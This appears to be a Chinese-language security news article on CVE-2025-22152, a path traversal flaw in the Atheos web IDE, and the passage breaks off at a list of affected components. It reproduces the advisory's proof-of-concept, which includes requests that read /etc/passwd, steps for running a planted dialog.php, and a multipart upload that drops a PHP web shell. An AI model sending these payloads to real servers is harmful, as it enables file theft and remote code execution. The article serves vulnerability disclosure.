CVE-2025-22152（CVSS 9.4）：在 Atheos 基于 Web 的集成开发环境中发现严重漏洞-安全KER

CVE-2025-22152

来自 Atheos 项目的安全公告披露了一个关键漏洞 (CVE-2025-22152)，该漏洞可能会危及运行基于 Web 的 IDE 框架的服务器。这个路径遍历漏洞的 CVSSv4 得分为 9.4，它使用户面临重大风险，包括未经授权的文件访问、远程代码执行和任意文件上传。

Atheos 是轻量级网络集成开发环境（IDE）Codiad 的一个现代化分叉，并得到了积极维护。该平台以最低要求和现代化工具而著称，允许开发人员在浏览器中进行编码，是简化工作流程的热门选择。然而，在 v559 之前的版本中存在一个关键缺陷，威胁着 Atheos 安装的完整性和安全性。

该公告解释说，由于多个组件对 $path 和 $target 参数的验证不当，导致该框架容易受到路径遍历攻击、未经授权的文件执行和任意文件上传。攻击者可利用该漏洞读取、修改或执行服务器上的任意文件，从而可能导致服务器全面崩溃。

该公告指出：“多个组件中的 $path 和 $target 参数未得到正确验证，允许攻击者在服务器上读取、修改或执行任意文件。”

安全公告举例说明了如何利用这些漏洞：

通过 download.php 或 filemanager.php 进行路径遍历

攻击者可使用处理不当的参数访问敏感的系统文件，如 /etc/passwd：

GET /components/transfer/download.php?filename=/var/www/html/workspace/../../../../etc/passwd HTTP/1.1
POST /controller.php?filename=target=filemanager&action=open&path=/etc/passwd HTTP/1.1

2. 通过 dialog.php 执行未授权代码

通过操作路径遍历参数，可以创建并执行恶意对话框文件：

Create a file named dialog.php in ${WORKSPACE}/${USERNAME}/dialog.php with malicious code.
Send a request to dialog.php, setting $target to ../workspace/${username}/dialog.php, set $action to anything not empty.

3. 任意上传文件

攻击者可利用 $filename 参数将恶意文件上传到未经授权的位置。

POST /controller.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPqrw3XyGKBzQQ04H

------WebKitFormBoundaryPqrw3XyGKBzQQ04H
Content-Disposition: form-data; name="upload[]"; filename="../../../../shell.php" <--- Path traversal vulnerability
Content-Type: text/php

<?php system($_GET["cmd"]);?>

------WebKitFormBoundaryPqrw3XyGKBzQQ04H
Content-Disposition: form-data; name="target"

transfer
------WebKitFormBoundaryPqrw3XyGKBzQQ04H
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryPqrw3XyGKBzQQ04H
Content-Disposition: form-data; name="path"

/var/www/html
------WebKitFormBoundaryPqrw3XyGKBzQQ04H--

CVE-2025-22152 漏洞影响 v559 之前的所有 Atheos 版本。受影响的主要组件包括：